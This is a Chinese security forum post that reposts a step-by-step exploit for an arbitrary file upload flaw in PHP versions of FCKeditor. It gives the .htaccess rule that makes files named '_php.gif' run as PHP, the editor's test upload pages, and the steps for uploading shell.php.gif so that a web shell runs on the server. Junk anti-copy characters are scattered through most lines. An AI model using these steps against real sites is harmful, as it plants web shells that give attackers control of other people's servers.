找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2349|回复: 0
打印 上一主题 下一主题

FCKeditor所有php版本Upload上传漏洞

[复制链接]
跳转到指定楼层
楼主
发表于 2013-10-27 17:25:21 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
FCKeditor所有php版本Upload上传漏洞
6 M5 B4 x/ g* @' m7 ~6 [作者:佚名 来源:本站整理 发布时间:2011-10-25 7:39:07
) E% v! j! ]1 A* k: Z8 A& p减小字体 增大字体
, X1 j+ t$ ^  n0 P" L% l: T[+] Title:FCKeditor all versian Arbitrary File Upload Vulnerability
) u% i# b# I2 J: o) z4 S[+] Date: 2011, ]2 _4 b7 p3 @
[+] Author : sinesafe.cn- Y' R2 c1 P) ^' g0 ^( C0 r
[+] Website : WwW.sinesafe.cn6 T0 B" o$ U5 t" u
———————————————————
* T* Q- W9 w$ |5 u, y! ~1.create a htaccess file:  R) }4 h& \" [" R
code:$ D) i  l3 ~9 L2 L  v
<FilesMatch “_php.gif”>
" s  |& u# V/ f* LSetHandler application/x-httpd-php
$ s$ t% g5 V, V" |8 M* k</FilesMatch>/ o; D# S+ s2 |# D; `9 D
/ F; N& K+ T6 S7 o4 c% }  W, e' i& ~
2.Now upload this htaccess with FCKeditor.
# |9 u. i+ D( o* K6 z
- `' r$ v/ w! b. Y. \http://www.sinesafe.cn/FCKeditor ... er/upload/test.html( y9 }. G1 m2 s; d) r! M

8 o. M- a, A/ F0 a# bhttp://www.sinesafe.cn/FCKeditor ... onnectors/test.html2 M2 \! b3 A+ W3 n0 P4 I
* y. y, F) V( T3 n
———————————————————————————————-
0 ~4 n: e9 c& J4 T3.Now upload shell.php.gif with FCKeditor.5 d& m9 ]$ |0 {. o+ g$ r) H  u- y
4.After upload shell.php.gif, the name “shell.php.gif” change to “shell_php.gif” automatically.
. L2 i4 |* q' N/ g0 y" M: y5.http://www.sinesafe.cn/anything/shell_php.gif
5 y& f2 `, w% b6.Now shell is available from server.
2 e+ j8 W* r  C- P( z/ ~0 u
) p+ H6 Z! i; I- R  K  }# a- W

0 B  n- ^" `; }0 R- x
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表